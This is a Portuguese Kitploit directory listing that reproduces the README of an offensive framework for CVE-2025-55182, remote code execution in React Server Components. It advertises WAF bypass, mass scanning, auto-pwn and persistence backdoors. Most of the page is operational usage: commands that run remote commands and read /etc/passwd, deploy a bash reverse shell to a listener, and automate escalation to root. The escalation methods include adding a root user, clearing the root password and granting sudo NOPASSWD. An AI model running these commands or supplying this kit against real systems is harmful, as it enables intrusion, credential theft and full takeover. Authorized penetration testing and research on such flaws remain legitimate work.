Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Cerberus-React2Shell-Scanner-Exploit — Kit de exploração de elite para CVE-2025-55182 (RCE em React Server Components). Payloads polimórficos assíncronos, bypass avançado de WAF/CDN, rotação de proxy, varredura em massa Shodan/Censys, auto-pwn + shells reversas, templates Nuclei, laboratório K8s e dashboard C2. Autorado por Sudeepa Wanigarathna – estritamente para red team autorizado e testes de penetração. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
Frameworks de Testes de PenetraçãoEscalada de PrivilégiosScanners de VulnerabilidadesFrameworks de ExploraçãoShellcodeExploração de Aplicações WebPós-ExploraçãoComando e ControleAprendizado e Educação
Red Teaming
Desenvolvimento de Payloads
Labs e Prática
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

Ver Repositório
218há 18 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Kit de exploração de elite para CVE-2025-55182 (RCE em React Server Components). Payloads polimórficos assíncronos, bypass avançado de WAF/CDN, rotação de proxy, varredura em massa Shodan/Censys, auto-pwn + shells reversas, templates Nuclei, laboratório K8s e dashboard C2. Autorado por Sudeepa Wanigarathna – estritamente para red team autorizado e testes de penetração.

Compartilhar

Cerberus React2Shell - Framework de Exploração Armado

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 Visão Geral

Framework de exploração de nível profissional para a vulnerabilidade de RCE em Server Actions do Next.js (React2Shell). Demonstra a cadeia de ataque completa, desde o acesso inicial até a escalada de privilégios para root.

Capacidades:

  • ✅ Detecção automatizada de vulnerabilidades
  • ✅ Execução Remota de Código (RCE)
  • ✅ Acesso a shell interativo
  • ✅ Enumeração de sistemas Linux
  • ✅ Escalada automatizada de privilégios
  • ✅ Implantação de reverse shell
  • ✅ Upload/download de arquivos
  • ✅ Demonstração de acesso root

🚀 Início Rápido

RCE Básico

root@kitploit:~
# Verificar vulnerabilidade
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Executar comando
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

Shell Interativo

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

Cadeia de Ataque Automatizada Completa

root@kitploit:~
# Exploração completa: RCE → Enumeração → Acesso Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 Estrutura do Framework

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # Motor de exploração principal (400+ linhas)
├── demo_exploit.py              # Cadeia de ataque automatizada (290+ linhas)
├── interactive_shell.py         # Shell interativo (280+ linhas)
├── reverse_shell_handler.py     # Listener de reverse shell (180+ linhas)
├── post_exploit/
│   ├── linux_enum.py           # Enumeração do sistema (330+ linhas)
│   ├── priv_esc.py             # Escalada de privilégios (320+ linhas)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # Documentação completa de uso
├── QUICKSTART.md                # Referência rápida
└── BANNER.txt

🔥 Recursos

Motor de Exploração Principal

  • Descoberta de Action ID: Extração automática de bundles JavaScript
  • Múltiplos Payloads: Variantes execSync, spawn, eval, mainModule
  • Extração de Saída: Análise da saída de comandos a partir de respostas de erro
  • Bypass de WAF: Técnicas de ofuscação de payloads

Pós-Exploração

  • Enumeração Linux: Binários SUID/SGID, caminhos graváveis, cron jobs, versão do kernel
  • Escalada de Privilégios: GTFOBins, arquivos /etc graváveis, escape de Docker, capabilities
  • Operações com Arquivos: Upload/download com codificação base64
  • Persistência: Múltiplos métodos de backdoor

Ferramentas Interativas

  • Shell Interativo: Execução de comandos em tempo real com comandos integrados
  • Reverse Shell: Múltiplos tipos de shell (bash, python, nc, perl)
  • Modo Demo: Demonstração automatizada em 6 etapas

📖 Exemplos de Uso

1. Comandos Básicos

root@kitploit:~
# Verificação de vulnerabilidade
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Executar comandos
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# Diferentes variantes de payload
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# Com ofuscação
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. Shell Interativo

root@kitploit:~
# Iniciar shell
python3 interactive_shell.py --target http://127.0.0.1:3000

# Comandos disponíveis:
# - execute <cmd>        : Executar comando de shell
# - enum                 : Executar enumeração completa
# - escalate             : Tentar escalada de privilégios
# - upload <local> <remote>  : Enviar arquivo
# - download <remote> <local>: Baixar arquivo
# - shell <lhost> <lport>: Implantar reverse shell
# - info                 : Mostrar informações da sessão
# - exit                 : Sair

3. Reverse Shell

root@kitploit:~
# Terminal 1: Iniciar listener
python3 reverse_shell_handler.py --lport 4444

# Terminal 2: Implantar shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. Demo Automatizada

root@kitploit:~
# Cadeia completa: Descoberta → RCE → Enumeração → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 Cadeia de Ataque

O framework implementa uma cadeia de exploração completa em 6 etapas:

  1. Descoberta - Extrair Server Action IDs de bundles JavaScript
  2. Exploração - Encontrar Action ID funcional e alcançar RCE
  3. Verificação - Confirmar execução de código com o comando id
  4. Enumeração - Coletar informações do sistema, binários SUID, caminhos graváveis
  5. Escalada - Explorar automaticamente vetores de escalada de privilégios
  6. Demonstração - Provar acesso root lendo /etc/shadow e listando /root

🛡️ Técnicas de Escalada de Privilégios

Métodos Implementados

  1. Binários SUID (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. Arquivos /etc Graváveis

    • /etc/passwd - Adicionar novo usuário root
    • /etc/shadow - Limpar senha do root
    • /etc/sudoers - Conceder sudo NOPASSWD
  3. Escape de Docker

    • Exploração de socket Docker acessível
    • Fuga de container privilegiado
  4. Exploits de Kernel

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. Capabilities Linux

    • Exploração de CAP_SETUID, CAP_DAC_OVERRIDE

📊 Estatísticas

  • Total de Linhas de Código: 1.800+
  • Módulos: 8
  • Técnicas de Escalada de Privilégios: 5
  • Variantes de Payload: 4
  • Tipos de Shell: 4 (bash, python, nc, perl)

⚙️ Requisitos

root@kitploit:~
pip install -r requirements.txt

Dependências:

  • requests
  • colorama

📚 Documentação

  • EXPLOITATION_GUIDE.md - Guia de uso completo com exemplos
  • QUICKSTART.md - Referência rápida para comandos comuns

⚠️ Aviso Legal

AVISO: Esta ferramenta é apenas para testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Use apenas em sistemas que você possui ou para os quais tenha permissão escrita explícita para testar.

O autor não é responsável por qualquer uso indevido desta ferramenta. Use por sua conta e risco.

🎓 Propósito Educacional

Este framework foi projetado para:

  • Pesquisadores de segurança que estudam vulnerabilidades do Next.js
  • Testadores de penetração com autorização
  • Treinamento de segurança e desafios CTF
  • Pesquisa de vulnerabilidades em ambientes de laboratório controlados

📄 Licença

Licença MIT (Apenas para Fins Educacionais)

👤 Autor

Sudeepa Wanigarathna

  • Especialista em Desenvolvimento de Exploits
  • Pesquisador de Segurança
  • Testador de Penetração

Versão: 1.0
Última Atualização: Dezembro de 2025

Para instruções detalhadas de uso, consulte EXPLOITATION_GUIDE.md

Baixar ferramenta